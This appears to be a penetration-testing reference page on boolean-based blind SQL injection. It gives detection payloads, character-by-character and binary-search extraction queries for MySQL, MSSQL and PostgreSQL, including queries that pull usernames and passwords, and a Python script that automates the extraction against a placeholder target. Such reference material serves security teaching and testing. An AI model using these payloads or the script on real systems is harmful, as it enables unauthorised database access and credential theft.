> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Boolean-Based Blind

> Boolean-based blind SQL injection: extract data one bit at a time through true/false responses.

## Overview

No output or errors visible. Application responds differently (content, status code, redirect) for true vs false conditions. Extract data character by character.

***

## Detect

```
' AND 1=1-- -          → Normal response (TRUE)
' AND 1=2-- -          → Different response (FALSE)
```

If responses differ → boolean blind injectable.

***

## Extract Data — SUBSTRING

### Database Name Length

```
' AND LENGTH(database())=1-- -
' AND LENGTH(database())=2-- -
...
' AND LENGTH(database())=5-- -     → TRUE (length is 5)
```

### Database Name Character by Character

```
' AND SUBSTRING(database(),1,1)='a'-- -
' AND SUBSTRING(database(),1,1)='b'-- -
...
' AND SUBSTRING(database(),1,1)='t'-- -    → TRUE (first char is 't')
' AND SUBSTRING(database(),2,1)='e'-- -    → TRUE (second char is 'e')
```

### Faster — ASCII + Binary Search

```
' AND ASCII(SUBSTRING(database(),1,1))>96-- -     → TRUE (> 'a')
' AND ASCII(SUBSTRING(database(),1,1))>112-- -    → TRUE (> 'p')
' AND ASCII(SUBSTRING(database(),1,1))>120-- -    → FALSE
' AND ASCII(SUBSTRING(database(),1,1))>116-- -    → TRUE
' AND ASCII(SUBSTRING(database(),1,1))=116-- -    → TRUE (char = 't')
```

Binary search = \~7 requests per character instead of \~36.

***

## Extract Tables

### Count Tables

```
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=5-- -
```

### Table Name

```
' AND SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1,1)='u'-- -
```

***

## Extract Columns

```
' AND SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1),1,1)='i'-- -
```

***

## Extract Data

```
' AND SUBSTRING((SELECT username FROM users LIMIT 0,1),1,1)='a'-- -
' AND SUBSTRING((SELECT password FROM users LIMIT 0,1),1,1)='$'-- -
```

***

## MSSQL Syntax

```
' AND SUBSTRING((SELECT DB_NAME()),1,1)='m'-- -
' AND ASCII(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1,1))>100-- -
```

***

## PostgreSQL Syntax

```
' AND SUBSTRING((SELECT current_database()),1,1)='p'-- -
' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='public' LIMIT 1),1,1))>100-- -
```

***

## Automation Script (Python)

```python theme={"dark"}
import requests

url = "http://TARGET/page"
result = ""

for pos in range(1, 50):
    low, high = 32, 126
    while low <= high:
        mid = (low + high) // 2
        payload = f"' AND ASCII(SUBSTRING(database(),{pos},1))>{mid}-- -"
        r = requests.get(url, params={"id": payload})
        if "expected_true_content" in r.text:
            low = mid + 1
        else:
            high = mid - 1
    if low > 126:
        break
    result += chr(low)
    print(f"[+] {result}")

print(f"Result: {result}")
```

***

## Quick Reference

| Step          | Payload                                          |
| ------------- | ------------------------------------------------ |
| Detect        | `' AND 1=1-- -` vs `' AND 1=2-- -`               |
| Length        | `' AND LENGTH(database())=N-- -`                 |
| Char by char  | `' AND SUBSTRING(database(),POS,1)='x'-- -`      |
| Binary search | `' AND ASCII(SUBSTRING(database(),POS,1))>N-- -` |

***

## Sources

* [PortSwigger — Blind SQL Injection](https://portswigger.net/web-security/sql-injection/blind)
* [OWASP — Blind SQL Injection](https://owasp.org/www-community/attacks/Blind_SQL_Injection)
* [PortSwigger — SQL Injection Cheat Sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)
